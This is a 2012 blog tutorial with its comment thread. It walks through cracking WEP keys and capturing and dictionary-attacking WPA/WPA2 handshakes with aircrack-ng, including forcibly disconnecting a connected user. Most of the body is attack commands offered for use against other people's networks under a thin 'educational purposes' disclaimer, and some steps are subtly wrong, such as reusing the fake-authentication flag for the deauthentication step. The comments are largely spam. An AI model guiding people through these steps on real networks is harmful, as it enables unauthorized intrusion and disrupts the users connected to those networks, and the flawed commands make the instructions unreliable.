Cracking WEP, WPA and WPA2 Encrypted Wifi Networks using Aircrack-ng.

Posted: 03/04/2012 in G.N.A.HackTeam, Hacking, Linux Hacking, Mac Hacking, Windows Hacking
Tags: , , , , , , , , , , , , , , ,

Tutorial by Akatzbreaker

In this tutorial I will demonstrate you how to crack almost any Encrypted Network that uses WEP, WPA and WPA2.

1. Before we start.

Take into account the Disclaimer at this page: More from the G.N.A. Hack Team

What we need:

Mac and Windows:

I would recommend to Install Backtrack or Ubuntu on a VMWare virtual machine.


sudo apt-get install aircrack-ng airmon-ng airodump-ng aireplay-ng kismet

(Recommended Download for Linux Users – It auto configures the tools needed)


NOTHING! Every is included by default…..

NOTE: The pictures included in the tutorial are NOT mine….


2. WEP Cracking.

WEP is very easy and fast to crack. Here are the steps:

1. Put your Wireless Interface into Monitor Mode:

airmon-ng start wlan0

(In this example our interface is ‘wlan0′ – To find out your wireless interface type: iwconfig scan or airmon-ng )

2. Get Info from the Available Networks:

airodump-ng mon0

(mon0 is the monitored wlan0 interface)

3. Select one network that uses WEP encryption. In our Example the network is named SKIDHACKER. Now, get more info on the specific Network:

airodump-ng -c channel -w filetosave –bssid macaddrs mon0

(‘channel’ is the Channel Number) (‘filetosave’ is the file that airodump-ng will save its data) (‘macaddrs’ is the MAC Address of the Network) —> All this info is provided by the command used in Step 2.

4. To boost the proccedure type on a new terminal:

aireplay-ng -1 0 -a bssid mon0

(‘bssid’ is the MAC Address of the Network)

5. When this command is done, capture packets by typing:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b bssid mon0

(‘bssid’ is the Networks MAC Address)

6. When the above command gets about 20.000 – 30.000 packets you are now able to crack the network by typing:

aircrack-ng filename.cap

(where instead of ‘filename’.cap you enter the file that aireplay-ng saved at your current directory – This file is named wep-x.cap –x is a number, starting from ’01’, then ’02’ etc….–) (Instead of the ‘wep-01.cap’ you can use the ‘wep*.cap’ as in the example to ‘Auto-Select’ the file)

7. When aircrack-ng finds the key it will display something like:

KEY FOUND! [ 12:34:56:78:90 ]

(In this example our key is ‘1234567890’)

8. When Finished, make sure you put your wireless interface back to original Mode by typing:

airmon-ng stop wlan0


3. WPA – WPA2 Cracking

How it is Cracked:

WPA-WPA2 are a special case when it comes to Wireless Network Cracking. The method used to crack them is named ‘Handshake’. What should we do to get the Handshake is fooling a Computer connected to the network we will crack. Then we will use a dictionary to crack the Handshake and get the Key. So, this means that to crack these networks we need:

  • A huge dictionary / wordlist – The bigger, the Better. (You can find searching the web using terms like: ‘Large WPA-WPA2 Cracking Wordlist’)
  • A PC already connected to that network.

So, let’s go and crack that network:

1. Enter your wireless interface into monitor mode:

airmon-ng start wlan0

(List your interfaces by typing airmon-ng or iwlist scan)

2. Get the list of the networks available:

airodump-ng mon0

(‘mon0′ is the monitored interface)

3. Get info on a specific Network:

airodump-ng -c channel -w filename –bssid macaddrs mon0

(‘channel’ is the Network’s channel number) (‘filename’ is the name of the file that airodump-ng will save its data) (‘macaddrs’ is the Network’s MAC Address)

4. Note that under the STATION Tab there is a MAC address. This means that there is someone connected to that network and this is his PC’s MAC address. To get the handshake we will kick him off and he will automatically reconnect to the network.

So, to kick him of and get the handshake, type at a new terminal:

aireplay-ng -1 0 -a bssid mon0

(where ‘bssid’ you must type the Network‘s MAC Address)

5. When we successfully get the handshake, stop the proccess by hitting CTRL+C at the terminal that Airodump-ng is running. The handshake should be placed at your Home Folder.

To crack it type:

aircrack-ng -w dictionary /username/filename

(‘dictionary’ is the name/path of your dictionary) (‘username’ is your username – on Backtrack is ‘root’ by default) (‘filename’ is the captured WPA/WPA2 Handshake)



This was the end of this great tutorial. I note, once more, that you should read the diclaimer here and that all these hacking tutorials I make are only for educational purposes and to make you understand how hacking works.

More tutorials coming……


About these ads
  1. You are my intake , I own few blogs and infrequently run out from to post .

  2. This web site is basically attention-grabbing i am searching for is there any other examples? however anyway thanks considerably as a result of I found that i used to be looking for.

  3. nvmminh says:

    thanks you very much! i’m have learn so much :)

  4. Azeddine says:

    Thank you so much for getting involved, for your efforts and for sharing your knowledge with us!

  5. Every weekend i used to pay a quick visit this web site, because i want enjoyment, since this this web page conations genuinely
    nice funny stuff too.

  6. What’s up, every time i used to check webpage posts here early in the daylight, since i like to gain knowledge of more and more.

  7. What’s up, its nice post concerning media print, we all be familiar with media is a great source of data.

  8. Josh says:

    I’m impressed, I have to admit. Seldom do I encounter a blog that’s equally educative and interesting, and without a doubt,
    you have hit the nail on the head. The problem is an issue that not
    enough men and women are speaking intelligently
    about. Now i’m very happy I stumbled across this in my hunt for something regarding this.

  9. says:

    Hi there! This blog post couldn’t be written any better! Looking through this post reminds me of my previous roommate! He always kept talking about this. I will forward this article to him. Pretty sure he’ll have a good read.
    I appreciate you for sharing!

  10. mandi says:

    i didnt understand how can we do that in windows 7????

  11. Tony says:

    Akatzbreaker, one question: what if there is no one connected to that network so he doesn’t automatically reconnect. Can we go on with the cracking?

  12. Intrahack says:

    I only have NICs, no external network adapters. When I use “ifconfig”, I only end up with eth0 and lo. The mon0 interface. never appears. How can I attach a NIC to the VM?

  13. When choosing a contractor for a Northern Virginia home
    remodel greening project. Annually each year, thousands, if not millions, of homeowners make the decision to remodel green your home, a heat exchanger, and ductwork in the house while
    you’re away each day. They have been inside the opponents 20 only once this year against Buffalo and they have a force to be reckoned with.

  14. What’s up to every single one, it’s actually a good for me to go to see this
    web site, it includes priceless Information.

  15. michal mataj says:

    Hi can anyone help me how can i get root previlages and how can i run programs as a root in LININUX OS ???? thank you
    sorry for bad english i am czech

  16. Phans says:

    Possibly a stupid question…
    Does this work on iOS?

  17. Bring 2 cups of water to a boil and add the red quinoa. Its leaves are
    withered and steamed, not fermented like black and oolong teas
    — green tea’s unique catechins, especially EGCG, which may
    be able to obliterate cancer cells without disturbing neighboring tissues.
    I think most of us bought into this promotional title Superfoods but when last time the ‘mortal’
    continental cucumber was claimed to be one of the Superfoods, I woke up.

  18. Adding holes, embossing, layers, special
    materials and even embedding materials can have a great and
    unique twist in your greeting card design. “Today is Valentine’s Day, or as men like to call it, Extortion Day. Add writing space inside the card, by gluing white or light paper on the inside of the card.

  19. beats studio headphones
    What’s up, I check your new stuff regularly. Your writing style is witty, keep up the good work!

  20. replica louis vuitton handbags online
    Good day! I could have sworn I’ve visited this blog before
    but after browsing through a few of the posts I realized it’s new to me.
    Regardless, I’m certainly delighted I discovered it and I’ll be
    bookmarking it and checking back frequently!

  21. website says:

    My brother recommended I might like this web site. He was entirely right.
    This post truly made my day. You cann’t imagine just how much
    time I had spent for this information! Thanks!

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s